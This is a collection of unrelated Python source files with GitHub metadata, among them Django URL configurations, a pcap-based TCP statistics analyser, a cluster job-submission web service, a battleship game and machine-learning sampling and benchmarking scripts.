TestEntry( text = "and I quote: "..."" ),
TestEntry( text = "Stay home! Practice on Leetcode :)" ),
TestEntry( text = "x > y && x < y is always false" ),
TestEntry( text = "leetcode.com⁄problemset⁄all" ),
]
# expected output:
'''
& is an HTML entity but &ambassador; is not.
and I quote: "..."
Stay home! Practice on Leetcode :)
x > y && x < y is always false
leetcode.com/problemset/all
'''
for t in test_data:
print( Solution().entityParser( text = t.text) )
return
if __name__ == '__main__':
test_bench()
|
[
"brianchiang1988@icloud.com"
] |
brianchiang1988@icloud.com
|
72f601d574e8d581120332421e096abfc29920f1
|
3280dd107a70e7d3637bfcfc2819f9b1477ed99a
|
/Myquizproject/Myquizproject/urls.py
|
55bd04fcaf038ecb464df39accb26f55b4cbb00c
|
[] |
no_license
|
pooja666-v/pv_Quiz_repo
|
80b9cc3cb1c45a48e30f9e4f15392bbdf02bf22b
|
fc59c7fb7a92549b8cea3fac0f4cb451bdbcc2f7
|
refs/heads/master
| 2023-05-26T23:17:45.797984
| 2021-06-15T13:01:31
| 2021-06-15T13:01:31
| 376,889,813
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,568
|
py
|
"""Myquizproject URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from quiz import views
from django.contrib.auth.views import LogoutView,LoginView
urlpatterns = [
path('admin/', admin.site.urls),
path('teacher/',include('teacher.urls')),
path('student/',include('student.urls')),
path('',views.home_view,name=''),
path('logout', LogoutView.as_view(template_name='quiz/logout.html'),name='logout'),
path('aboutus', views.aboutus_view),
path('contactus', views.contactus_view),
path('afterlogin', views.afterlogin_view,name='afterlogin'),
path('adminclick', views.adminclick_view),
path('adminlogin', LoginView.as_view(template_name='quiz/adminlogin.html'),name='adminlogin'),
path('admin-dashboard', views.admin_dashboard_view,name='admin-dashboard'),
path('admin-teacher', views.admin_teacher_view,name='admin-teacher'),
path('admin-view-teacher', views.admin_view_teacher_view,name='admin-view-teacher'),
path('update-teacher/<int:pk>', views.update_teacher_view,name='update-teacher'),
path('delete-teacher/<int:pk>', views.delete_teacher_view,name='delete-teacher'),
path('admin-view-pending-teacher', views.admin_view_pending_teacher_view,name='admin-view-pending-teacher'),
path('admin-view-teacher-salary', views.admin_view_teacher_salary_view,name='admin-view-teacher-salary'),
path('approve-teacher/<int:pk>', views.approve_teacher_view,name='approve-teacher'),
path('reject-teacher/<int:pk>', views.reject_teacher_view,name='reject-teacher'),
path('admin-student', views.admin_student_view,name='admin-student'),
path('admin-view-student', views.admin_view_student_view,name='admin-view-student'),
path('admin-view-student-marks', views.admin_view_student_marks_view,name='admin-view-student-marks'),
path('admin-view-marks/<int:pk>', views.admin_view_marks_view,name='admin-view-marks'),
path('admin-check-marks/<int:pk>', views.admin_check_marks_view,name='admin-check-marks'),
path('update-student/<int:pk>', views.update_student_view,name='update-student'),
path('delete-student/<int:pk>', views.delete_student_view,name='delete-student'),
path('admin-course', views.admin_course_view,name='admin-course'),
path('admin-add-course', views.admin_add_course_view,name='admin-add-course'),
path('admin-view-course', views.admin_view_course_view,name='admin-view-course'),
path('delete-course/<int:pk>', views.delete_course_view,name='delete-course'),
path('admin-question', views.admin_question_view,name='admin-question'),
path('admin-add-question', views.admin_add_question_view,name='admin-add-question'),
path('admin-view-question', views.admin_view_question_view,name='admin-view-question'),
path('view-question/<int:pk>', views.view_question_view,name='view-question'),
path('delete-question/<int:pk>', views.delete_question_view,name='delete-question'),
]
|
[
"poojavasawade98@gmail.com"
] |
poojavasawade98@gmail.com
|
233d511497513d1530a9e8ff0eb47948dc21f5d0
|
d33065f76aa1a59142794364bb65526771ee71b3
|
/PDS/tcpstats
|
0bf7c29658d2db29425445bd767ee5578cad4f0f
|
[] |
no_license
|
annaostroukh/University-projects
|
31e300aa0674e13a6d3cb83dc4ccc0161e98bb02
|
d16e64030f4230107130d770e3c15e472aed7319
|
refs/heads/master
| 2021-01-11T14:14:20.619238
| 2017-02-07T14:50:46
| 2017-02-07T14:50:46
| 81,216,867
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,103
|
#!/usr/bin/env python2.7
import datetime
from decimal import Decimal
import socket
import struct
import sys
import webbrowser
import dpkt
from dpkt.tcp import TCP
from dpkt.ethernet import Ethernet
from dpkt.ip import IP, IP_PROTO_TCP
import json
def main():
computeTCPStat()
# function parse a packet capture
# @filename is a name of file which we parse
# return file_entries - list of dictionaries with parsed tcp data
def fileParse(filename):
f = open(filename, 'rb') # opening a packet file
pcap = dpkt.pcap.Reader(f) # reading a packet file
packet_counter = 0 # counter of packets in a file
file_entries = [] # list of dictionaries of tcp data entries
keys = ('packet #', 'time', 'len', 'seq', 'ack', 'window', 'scale factor', 'payload', 'sum', 'flags', 'source', 'source ip', 'destination', 'destination ip') # keys for each value in dictionary
for timestamp, buf in pcap:
packet_counter += 1
eth = Ethernet(buf)
if eth.type != dpkt.ethernet.ETH_TYPE_IP: # if not an IP packet
continue
ip = eth.data
dst_ip = socket.inet_ntoa(ip.dst)
src_ip = socket.inet_ntoa(ip.src)
if ip.p != IP_PROTO_TCP: # if not a TCP packet
print ("No TCP packet found")
continue
tcp = ip.data
# Allow to decode flags
fin_flag = (tcp.flags & dpkt.tcp.TH_FIN) != 0
syn_flag = (tcp.flags & dpkt.tcp.TH_SYN) != 0
rst_flag = (tcp.flags & dpkt.tcp.TH_RST) != 0
psh_flag = (tcp.flags & dpkt.tcp.TH_PUSH) != 0
ack_flag = (tcp.flags & dpkt.tcp.TH_ACK) != 0
urg_flag = (tcp.flags & dpkt.tcp.TH_URG) != 0
ece_flag = (tcp.flags & dpkt.tcp.TH_ECE) != 0
cwr_flag = (tcp.flags & dpkt.tcp.TH_CWR) != 0
# human-readable definitions of flags
flags = (("FIN " if fin_flag else "") +
("SYN " if syn_flag else "") +
("RST " if rst_flag else "") +
("PSH " if psh_flag else "") +
("ACK " if ack_flag else "") +
("URG " if urg_flag else "") +
("ECE " if ece_flag else "") +
("CWR " if cwr_flag else ""))
        # define window scale factor; option kind 3 is the TCP window-scale
        # option. Default to 0 (no scaling) so WSCALE is always bound even
        # when a packet carries no window-scale option.
        WSCALE = (0,)
        option_list = dpkt.tcp.parse_opts(tcp.opts)
        for option in option_list:
            if option[0] == 3:
                WSCALE = struct.unpack(">b", option[1])
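        # e.g. a raw advertised window of 229 with WSCALE 7 scales to
        # 229 * 2**7 = 29312 bytes (applied later via pow(2, scale factor))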
time = Decimal(datetime.datetime.utcfromtimestamp(timestamp).strftime('%S.%f'))
# tulip with values of each packet in dictionary
data = (packet_counter, time, len(buf), tcp.seq, tcp.ack, tcp.win, WSCALE[0], len(tcp.data), tcp.sum, flags, tcp.sport, src_ip, tcp.dport, dst_ip)
tcp_data = dict(zip(keys, data)) # matching keys with values and adding entries to the dictionary
file_entries.append(tcp_data) # creating a list of dictionaries with parsed tcp data
f.close()
return file_entries
def computeTCPStat():
print ("Parsing a file...")
file_entries = fileParse(filename)
timeVal = [] # list of dictionaries with time values
outputDict =[] # output dictionary
keysTime = ('packet #', 'time', 'delta')
curTime = 0 # current time for speed measurements
print ("Analysing statistics...")
for i in range(len(file_entries)):
# Setting up reference packet according to SYN flag (TCP connection initiated)
if file_entries[i]['flags'] == 'SYN ':
refPacket = file_entries[i]['packet #']
timeVal.append({'packet #': refPacket, 'time': Decimal(0.000000), 'delta': Decimal(0.000000)}) # Setting up reference time and adding reference packet to dictionary
# Computing delta and reference time
for refPacket in range(len(file_entries) - refPacket):
delta = file_entries[refPacket+1]['time'] - file_entries[refPacket]['time'] # Time delta from reference packet
time = delta + Decimal(timeVal[refPacket]['time']) # Time since reference packet
packet = refPacket+2
# Saving time statistics to dictionary
dataTime = (packet, time, abs(delta))
timeVal.append(dict(zip(keysTime, dataTime)))
# Getting the receiver and sender parameters of a TCP connection
for i in range(len(file_entries)):
if file_entries[i]['flags'] == 'SYN ':
receiverIP = file_entries[i]['destination ip']
receiverWinScale = pow(2, file_entries[i]['scale factor'])
if file_entries[i]['flags'] == 'SYN ACK ':
senderIP = file_entries[i]['destination ip']
senderWinScale = pow(2, file_entries[i]['scale factor'])
# Receiver window
for i in range(len(file_entries)):
if (file_entries[i]['flags'] != 'SYN ' and file_entries[i]['flags'] != 'SYN ACK ') and file_entries[i]['destination ip'] == receiverIP and file_entries[i]['packet #'] == timeVal[i]['packet #']:
recWin = file_entries[i]['window'] * receiverWinScale
timeRecWin = timeVal[i]['time']
dataRec = (str(timeRecWin), str(recWin))
keysRec = ('ReceiverTime', 'RecWin')
outputDict.append(dict(zip(keysRec, dataRec)))
# Sender window
for i in range(len(file_entries)):
if (file_entries[i]['flags'] != 'SYN ' and file_entries[i]['flags'] != 'SYN ACK ') and file_entries[i]['destination ip'] == senderIP and file_entries[i]['packet #'] == timeVal[i]['packet #']:
sendWin = file_entries[i]['window'] * senderWinScale
timeSendWin = timeVal[i]['time']
dataSend = (str(timeSendWin), str(sendWin))
keysSend = ('SenderTime', 'SenderWin')
outputDict.append(dict(zip(keysSend, dataSend)))
# Round trip time
for i in range(len(file_entries)):
# Receiver RTT
if file_entries[i]['flags'] == 'ACK ' and file_entries[i]['destination ip'] == receiverIP and file_entries[i]['packet #'] == timeVal[i]['packet #']:
if file_entries[i]['seq'] == file_entries[i-1]['ack'] and file_entries[i-1]['flags'] != 'SYN ACK ' and file_entries[i-1]['flags'] != 'FIN ACK ':
rtt = timeVal[i-1]['delta']
seqNumber = file_entries[i-1]['seq']
dataRtt = (str(rtt * 1000), str(seqNumber)) # Saving rtt converted to [ms]
keysRtt = ('RTT', 'Sequence')
outputDict.append(dict(zip(keysRtt, dataRtt)))
# Slow start
for i in range(len(file_entries)):
# Receiver SS (packets from server)
if (file_entries[i]['flags'] == 'SYN ACK ' or file_entries[i]['flags'] == 'ACK ' or file_entries[i]['flags'] == 'FIN ACK ') and file_entries[i]['source ip'] == receiverIP and file_entries[i]['packet #'] == timeVal[i]['packet #']:
if file_entries[i]['flags'] == 'SYN ACK ':
time = 0 # setting reference time according to the first SYN ACK packet
if file_entries[i]['flags'] == 'ACK ' or file_entries[i]['flags'] == 'FIN ACK ':
time = time + timeVal[i]['delta'] # time on X-axis will show how RTT is changing since time reference
seqNumberSS = file_entries[i]['seq']
dataSS = (str(time), str(seqNumberSS))
keysSS = ('TimeSS', 'SequenceSS')
outputDict.append(dict(zip(keysSS, dataSS)))
# Sender SS (packets from client)
if (file_entries[i]['flags'] == 'SYN ' or file_entries[i]['flags'] == 'ACK ' or file_entries[i]['flags'] == 'FIN ACK ') and file_entries[i]['source ip'] == senderIP and file_entries[i]['packet #'] == timeVal[i]['packet #']:
seqNumberSS = file_entries[i]['seq']
timeSS = timeVal[i]['time']
dataSS = (str(timeSS), str(seqNumberSS))
keysSS = ('TimeSSsen', 'SequenceSSsen')
outputDict.append(dict(zip(keysSS, dataSS)))
# Speed of TCP connection in interval 0.01 s
timerRange = int((int(timeVal[-1]['time'])+1)/0.01) # setting up a required amount of steps to look through packets
for timer in range(timerRange):
lastTime = curTime
curTime = curTime + 0.01
byte = 0 # bytes of receiver
byteSen = 0 # bytes of sender
bytes =[]
bytesSen = []
for i in range(len(timeVal)):
# Receiver speed
if lastTime <= timeVal[i]['time'] <= curTime and file_entries[i]['source ip'] == receiverIP and file_entries[i]['packet #'] == timeVal[i]['packet #']:
byte = byte + file_entries[i]['len']
time = lastTime
bytes.append(byte)
# Sender speed
elif lastTime <= timeVal[i]['time'] <= curTime and file_entries[i]['source ip'] == senderIP and file_entries[i]['packet #'] == timeVal[i]['packet #']:
byteSen = byteSen + file_entries[i]['len']
timeSen = lastTime
bytesSen.append(byteSen)
# computing receiver bytes
if bytes:
bytessum = max(bytes)
else:
time = lastTime
bytessum = 0
dataSp = (str(time), str(bytessum))
keysSp = ('Time', 'BytesRec')
outputDict.append(dict(zip(keysSp, dataSp)))
# computing sender bytes
if bytesSen:
bytessumSen = max(bytesSen)
else:
timeSen = lastTime
bytessumSen = 0
dataSpSen = (str(timeSen), str(bytessumSen))
keysSpSen = ('TimeSen', 'BytesSen')
outputDict.append(dict(zip(keysSpSen, dataSpSen)))
# Exporting statistics to JSON log file
print ("Exporting statistics...")
file = open("log.json", "w")
json.dump(outputDict, file, indent = 1)
file.close()
if __name__ == "__main__":
if len(sys.argv)>1:
filename = sys.argv[1]
main()
|
[
"annaostroukh@gmail.com"
] |
annaostroukh@gmail.com
|
|
a0805ca69c9facac7d1aacfd3d9aa666d1741f76
|
94a27c14e31aeac3fe16980240e19634837679a8
|
/max-frequency.py
|
a9828419afb5ee165a3274267b910be6b95e359b
|
[] |
no_license
|
EEmery/anomaly-detection
|
73762045eb317f0dc565f1199b28c61ce8fe1756
|
3fbb098ea483c85a7f0bec46ca33c3b3b417dbbf
|
refs/heads/master
| 2020-04-05T23:28:35.698159
| 2017-09-10T00:35:39
| 2017-09-10T00:35:39
| 83,551,646
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,148
|
py
|
# Imports necessary libraries
print "Importing packages\n"
import pandas as pd
import matplotlib.pyplot as plt
from warnings import filterwarnings
from numpy import nan
# Ignores warnings
filterwarnings("ignore")
input_file_path = "Data/preprocessed_v2/not-normalized/"
periods = ['WEEK', 'MONTH', 'QUARTER', 'SEMESTER']
periods_amounts = [53, 12, 4, 2]
file_names = ['weekly', 'monthly', 'quarterly', 'semesterly']
# Iterates over all periods
for period, period_amount, file_name in zip(periods, periods_amounts, file_names):
print "Making " + file_name + " analysis"
# Opens file (related to the period)
periodic_analysis = pd.read_csv(input_file_path + file_name + '_analysis.csv')
    # Remove the dependence on YEAR by offsetting period indices across years
periodic_analysis[period] = periodic_analysis[period] + (periodic_analysis['YEAR'] - 2015) * period_amount
# Slices data frame to get only necessary columns
periodic_analysis = periodic_analysis[['ID', period, 'FREQUENCY', 'GE_MEAN', 'GNV_MEAN', 'GP_MEAN', 'DO_MEAN']]
# Reshapes data frame to desired shape
periodic_analysis = periodic_analysis.set_index(['ID', period])
periodic_analysis = periodic_analysis.stack().unstack(1)
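    # After stack().unstack(1) the frame is indexed by (ID, metric name) with
    # one column per period, so idxmax(axis=1) below can pick, per ID, the
    # period of highest frequency.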
# Gets the period of higher frequency
max_frequencies = periodic_analysis.loc(axis=0)[:, 'FREQUENCY'].idxmax(axis=1).reset_index().rename(columns={0:'STAMP'})
# Creates a data frame for final results
result_df = pd.DataFrame(columns = ['ID', 'GE_MEAN', 'GNV_MEAN', 'GP_MEAN', 'DO_MEAN'])
# Iterates over the ID's
for i, ID, STAMP in zip(range(len(max_frequencies)), max_frequencies['ID'], max_frequencies['STAMP']):
data = periodic_analysis.loc(axis=0)[ID].ix[1:, STAMP] # Gets the means from the higher frequency period
row = [ID]
        for mean in ['GE_MEAN', 'GNV_MEAN', 'GP_MEAN', 'DO_MEAN']: # Iterates over all fuel type means
try:
row.append(data[mean]) # Appends to final result
except KeyError:
row.append(nan)
result_df.loc[i] = row # Appends to result data frame
# Show some data
if period == 'MONTH':
print len(result_df)
periodic_analysis.loc['741NKH'].T.plot.bar()
plt.show()
|
[
"emeryecs@gmail.com"
] |
emeryecs@gmail.com
|
e65631e729c8549976a81aa1a8b98e467e8c7c78
|
228dd278c875b9539908afffefcfe5b130a28a62
|
/v2/src/code/measure_service2.py
|
44431c1f5d47dc6869ce58091850202aa7bda78f
|
[] |
no_license
|
sheriefvt/MARS-services
|
57d9ca81f1f606ca8a8938e75b41fb806a36f8b9
|
a5f6b6140b0c8a30cd083a41a465f0bc999017a1
|
refs/heads/master
| 2021-04-30T12:50:53.156082
| 2018-02-13T02:06:11
| 2018-02-13T02:06:11
| 121,283,295
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,415
|
py
|
__author__ = 'Sherif Abdelhamid'
#Measure Service Version 1.0 Beta
from bottle import get, post, request, run # or route
import os
import threading
import time
import networkx as nx
import sqlite3
import json
import datetime
import ConfigParser,io
with open ('mars.config', "r") as myfile:
data=myfile.read()
config = ConfigParser.RawConfigParser(allow_no_value=True)
config.readfp(io.BytesIO(data))
server = config.get("MARS_configuration", "server")
host = config.get("MARS_configuration", "host")
port = config.get("MARS_configuration", "port")
port2 = config.get("MARS_configuration", "port2")
port3 = config.get("MARS_configuration", "port3")
database_path = config.get("MARS_configuration", "database")
index_path1 = config.get("MARS_configuration", "index1")
index_path2 = config.get("MARS_configuration", "index2")
file_path = config.get("MARS_configuration", "uploadfile")
qsub_path = config.get("MARS_configuration", "qsub")
graph_path = config.get("MARS_configuration", "graph")
code_path = config.get("MARS_configuration", "code")
output_path = config.get("MARS_configuration", "output")
qlog_path = config.get("MARS_configuration", "qlog")
class MyError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
##End point to call the measure service to compute a specific measure on a network.
@get('/graphservice/measure/compute')
def do_compute():
gname = request.query.get('graph')
mid = request.query.get('measure')
p = getmeasureinfo(mid)
if p[3]=='None':
par=''
else:
par = p[3]
ts = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d--%H:%M:%S')
if p[1]=="networkx":
tmp=networkx_qsub(gname,p[0],ts,par)
elif p[1] == "galib":
tmp = galib_qsub(gname,p[2],ts,par,p[0])
elif p[1] == "standalone":
tmp = cplus_qsub(gname,p[2],ts,par,p[0])
elif p[1] == "sql":
tmp =sql_qsub(gname,ts,p[5],p[2],p[4],p[0])
name =qsub_path +gname+"-"+mid+'.qsub'
f1 = open(name, "w")
f1.write(tmp)
f1.close()
if os.path.exists(name):
qb = threading.Thread(name='qsub_worker', target=qsub_worker(name))
qb.start()
return
##Function to create qsub file for calculating degree within DBMS
def sql_qsub(gname,ts,dbname,sqlstmt,target,m):
tmp2=sqlstmt.format(g=gname)
tmp='''#!/bin/bash
#PBS -lwalltime=10:00:00
#PBS -W group_list=sipcinet
#PBS -q sfx_q
#PBS -N {gname}-{measure}-MARS
#PBS -o {qp}{graph_name}{ti}.qlog
cd $PBS_O_WORKDIR
sqlite3 {dp} 'update {g}_{tr} set {mn} = ({sq})'
'''.format(g=gname,mn=dbname,ti=ts,tr=target,sq=tmp2,dp=database_path,measure=m,qp=qlog_path)
return tmp
##Function to create qsub file for calculating different measures using networkx library. Currently, it calculates the degree,
# betweenness_centrality, clustering, load_centrality, node_clique_number, and closeness_centrality.
def networkx_qsub(gname,command,ts,parameter):
tmp='''#!/bin/bash
#PBS -lwalltime=10:00:00
#PBS -W group_list=sipcinet
#PBS -q sfx_q
#PBS -N {graph_name}-{measure}-MARS
#PBS -o {qp}{graph_name}{ti}.qlog
cd $PBS_O_WORKDIR
export PATH=/home/sipcinet/edison/python-2.7.9/bin:$PATH
python {cp}measure.py {gp}{graph_name} {op}{graph_name}_{measure}.out {measure} {graph_name} {pr}
'''.format(graph_name=gname,measure=command,ti=ts,cp=code_path,op=output_path,pr=parameter,gp=graph_path,qp=qlog_path)
return tmp
##Function to create qsub file for calculating k-shell using code provided by Chris Kulhman. Code is an executable.
def cplus_qsub(gname,mname,ts,parameter,command):
tmp='''#!/bin/bash
#PBS -lwalltime=10:00:00
#PBS -W group_list=sipcinet
#PBS -q sfx_q
#PBS -N {graph_name}-{cmd}-MARS
#PBS -o {qp}{graph_name}{ti}.qlog
cd $PBS_O_WORKDIR
export PATH=/home/sipcinet/edison/python-2.7.9/bin:$PATH
{cp}{measure} {gp}{graph_name}.uel {pr} {op}{graph_name}_{cmd}.out
'''.format(graph_name=gname,measure=mname,ti=ts,cp=code_path,gp=graph_path,pr=parameter,cmd=command,op=output_path,qp=qlog_path)
return tmp
##Function to create qsub file for calculating clustering coef. using code provided by Maliq. Code is an executable
def galib_qsub(gname,mname,ts,parameter,cmd2):
tmp='''#!/bin/sh
#PBS -l walltime=10:00:00
#PBS -l nodes=10:ppn=1
#PBS -W group_list=ndssl
#PBS -q ndssl_q
#PBS -A ndssl
#PBS -N {graph_name}-{cmd}-MARS
#PBS -o {qp}{graph_name}{ti}.qlog
#PBS -j oe
. /etc/profile.d/modules.sh
module add mvapich2/gcc
#module add mpiexec
time mpiexec -f $PBS_NODEFILE {cp}{command} {gp}{graph_name}.gph {op}{graph_name}_{cmd}.out {pr}
exit;
'''.format(graph_name=gname,command=mname,cp=code_path,ti=ts,pr=parameter,cmd=cmd2,gp=graph_path,op=output_path,qp=qlog_path)
return tmp
##Load measure information from DB
def getmeasureinfo(m):
db = sqlite3.connect(database_path)
c = db.cursor()
sqlt = ("select id,package,command,parameter,target from measure where id='{c}'").format(c=m)
c.execute(sqlt)
data = c.fetchone()
return data
##Submit qsub job request
def qsub_worker(name):
os.system('qsub {filename}'.format(filename=name))
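# Example request (illustrative; host and port3 come from mars.config, and the
# measure id must exist in the database's measure table -- both values here
# are placeholders):
#   curl 'http://<host>:<port3>/graphservice/measure/compute?graph=mygraph&measure=<measure_id>'
# The service looks up the measure's package, renders the matching qsub
# template and submits it via qsub in a background thread.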
run(server=server,host=host, port=port3,debug=True)
|
[
"sherif@cos.io"
] |
sherif@cos.io
|
7f083320d95a03e5d1511f9b21545afc2344cbca
|
3f0a0ee646326530c4cd6996276e8c819dfab65c
|
/battleship.py
|
5bcc8530ea64006f289500c7ec2e3a8ebc74e6fa
|
[] |
no_license
|
kidisty/Python-1
|
bde878603283a6b3b966296ad2d4b0f89f70000f
|
203cd35b07633610b3773c0100c342386e636935
|
refs/heads/master
| 2022-11-12T07:11:15.072699
| 2020-07-06T09:59:33
| 2020-07-06T09:59:33
| 277,503,399
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,215
|
py
|
import random
board = []
for x in range(5):
board.append(["O"] * 5)
def print_board(board):
for row in board:
print " ".join(row)
print "Let's play Battleship!"
print_board(board)
def random_row(board):
return random.randint(0, len(board) - 1)
def random_col(board):
return random.randint(0, len(board[0]) - 1)
ship_row = random_row(board)
ship_col = random_col(board)
# print ship_row
# print ship_col
turn = 0
# Everything from here on should go in your for loop!
# Be sure to indent four spaces!
for turn in range(4):
guess_row = input("Guess Row:")
guess_col = input("Guess Col:")
if guess_row == ship_row and guess_col == ship_col:
print "Congratulations! You sunk my battleship!"
break
else:
if (guess_row < 0 or guess_row > 4) or (guess_col < 0 or guess_col > 4):
print "Oops, that's not even in the ocean."
elif(board[guess_row][guess_col] == "X"):
print "You guessed that one already."
else:
print "You missed my battleship!"
board[guess_row][guess_col] = "X"
# Print (turn + 1) here!
    if turn == 3:  # last of the four allowed turns (range(4) never exceeds 3)
print "Game Over"
print turn + 1
print_board(board)
|
[
"kidistyohannes@kidists-MacBook-Pro.local"
] |
kidistyohannes@kidists-MacBook-Pro.local
|
dcbe927e6b4d7e84a65d80d415af4b07cbf43625
|
7e64b95e39d9a0a95e25eae82b01bfef2b6e550c
|
/benchmarking/model_one_job_batched.py
|
03714abbeeabd1ced60e64916c8e2a06568264bb
|
[
"MIT"
] |
permissive
|
yuGithuuub/scCODA_reproducibility
|
a927075d9cbca2b0f1ff4d9ad74b872e286591dc
|
1f2565eca4bc9e6ccd16aa6885ccde6c19caa196
|
refs/heads/main
| 2023-01-23T03:23:04.559234
| 2020-12-10T15:14:19
| 2020-12-10T15:14:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,832
|
py
|
# Only relevant for server execution
import pickle as pkl
import sys
import os
import benchmark_utils as add
dataset_path = sys.argv[1]
save_path = sys.argv[2]
model_name = sys.argv[3]
count = int(sys.argv[4])
if sys.argv[5] == "True":
keep_sccoda_results = True
else:
keep_sccoda_results = False
print("model name:", model_name)
file_name = os.listdir(dataset_path)[count]
if model_name == "ALDEx2_alr":
kwargs = {"server": True,
"method": "we.eBH",
"mc_samples": 128,
"denom": [5],
"alpha": 0.05,
"fdr_correct": False}
elif model_name == "ALDEx2":
kwargs = {"server": True,
"method": "we.eBH",
"mc_samples": 128,
"alpha": 0.05,
"fdr_correct": False}
elif model_name in ["simple_dm", "scCODA"]:
kwargs = {"num_results": 20000,
"n_burnin": 5000,
"num_adapt_steps": 4000,
"keep_sccoda_results": keep_sccoda_results}
elif model_name in ["alr_ttest", "alr_wilcoxon"]:
kwargs = {"reference_index": 4,
"alpha": 0.05,
"fdr_correct": True}
elif model_name in ["Haber", "ttest", "clr_ttest", "dirichreg"]:
kwargs = {"alpha": 0.05,
"fdr_correct": True}
elif model_name == "scdc":
kwargs = {"server": True}
else:
kwargs = {}
if keep_sccoda_results:
results, effects = add.model_on_one_datafile(dataset_path+file_name, model_name, **kwargs)
results = add.get_scores(results)
save = {"results": results, "effects": effects}
else:
results = add.model_on_one_datafile(dataset_path+file_name, model_name, **kwargs)
results = add.get_scores(results)
save = results
with open(save_path + model_name + "_results_" + str(count) + ".pkl", "wb") as f:
pkl.dump(save, f)
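# Example invocation (illustrative; argument order follows the sys.argv reads
# above, and "scCODA" is one of the model names handled by the kwargs
# branches -- the directory names are placeholders):
#   python model_one_job_batched.py datasets/ results/ scCODA 0 True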
|
[
"johannes.ostner@online.de"
] |
johannes.ostner@online.de
|
c0fc1c5fe7e20c2b73669f3d38ce4eff71b3fa44
|
400f4a13784f93029dbe035392ba62f0956f1c1f
|
/sampler.py
|
8ec1187020e92427b9f63246e08ea5c919a22c2b
|
[
"MIT"
] |
permissive
|
ussama-azizun/Masked_Face_Recognition
|
5e3516ec0d99380ef22decdd06c536bfe79a6cd1
|
2dc572573ebd9ac208314690b529ed69addf0913
|
refs/heads/master
| 2023-07-13T03:49:27.553385
| 2021-08-03T07:51:35
| 2021-08-03T07:51:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,331
|
py
|
from torch.utils.data.sampler import Sampler
import itertools
import numpy as np
def samples(df):
    label_to_samples = []
    samples = []
    label = 0
    for index, row in df.iterrows():
        if index == 0:
            samples.append(index)
            label = row['target']
        else:
            if row['target'] != label:
                label_to_samples.append(samples)
                samples = []
                label = row['target']
            samples.append(index)
    # flush the final label's group, which the loop never appends on its own
    if samples:
        label_to_samples.append(samples)
    return label_to_samples
class PKSampler(Sampler):
def __init__(self, data_source, p=15, k=20):
super().__init__(data_source)
self.p = p
self.k = k
self.data_source = data_source
def __iter__(self):
pk_count = len(self) // (self.p * self.k)
for _ in range(pk_count):
labels = np.random.choice(np.arange(len(self.data_source.label_to_samples)), self.p, replace=False)
for l in labels:
indices = self.data_source.label_to_samples[l]
replace = True if len(indices) < self.k else False
for i in np.random.choice(indices, self.k, replace=replace):
yield i
def __len__(self):
pk = self.p * self.k
samples = ((len(self.data_source) - 1) // pk + 1) * pk
return samples
def grouper(iterable, n):
it = itertools.cycle(iter(iterable))
for _ in range((len(iterable) - 1) // n + 1):
yield list(itertools.islice(it, n))
# full label coverage per 'epoch'
class PKSampler2(Sampler):
def __init__(self, data_source, p=15, k=20):
super().__init__(data_source)
self.p = p
self.k = k
self.data_source = data_source
def __iter__(self):
rand_labels = np.random.permutation(np.arange(len(self.data_source.label_to_samples)))
for labels in grouper(rand_labels, self.p):
for l in labels:
indices = self.data_source.label_to_samples[l]
replace = True if len(indices) < self.k else False
for j in np.random.choice(indices, self.k, replace=replace):
yield j
def __len__(self):
num_labels = len(self.data_source.label_to_samples)
samples = ((num_labels - 1) // self.p + 1) * self.p * self.k
return samples
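# Illustrative usage sketch (assumptions, not from this file): a Dataset that
# exposes label_to_samples as built by samples(df) above; FaceDataset is a
# hypothetical name.
#
#   from torch.utils.data import DataLoader
#   dataset = FaceDataset(df)                   # hypothetical Dataset class
#   sampler = PKSampler(dataset, p=15, k=20)    # P labels x K samples per batch
#   loader = DataLoader(dataset, batch_size=15 * 20, sampler=sampler)
#   # each drawn batch then holds k samples for each of p labels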
|
[
"samyuan101234@gmail.com"
] |
samyuan101234@gmail.com
|
ab0c75ec1d40b45a73b6375c1400520dda72e2cd
|
1b9c4798836f7c38782995422efcdbe7b48ed459
|
/fashion/urls.py
|
96ad507ae51d691eb26decda0c9b1a42c8cd09c4
|
[] |
no_license
|
risa4an/fashion-blog
|
44ccff27dbe330665f1eeae460d636f6e8fe2d0d
|
aa46877246aa61b28dfdaea2e495c8e887a24f06
|
refs/heads/master
| 2022-12-22T10:38:48.718814
| 2020-09-16T19:56:55
| 2020-09-16T19:56:55
| 260,867,007
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,138
|
py
|
"""fashion URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.conf.urls.static import static
from django.contrib import admin
from django.urls import path, include
from django.conf.urls import include, url
from fashion import settings
from fashion.apps.accounts import views
urlpatterns = [
path('articles/', include('articles.urls'), name = 'home'),
path('admin/', admin.site.urls),
path('', include('accounts.urls')),
path('photographers/', include('photographers.urls'))
]
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)  # static() returns patterns that must be appended to take effect
|
[
"katya.risunova@gmail.com"
] |
katya.risunova@gmail.com
|
499cc74e02d9c9125a27b10ac84169ce55f05be3
|
7998125d3b2d3d1427f0715e9d7283b3108625c1
|
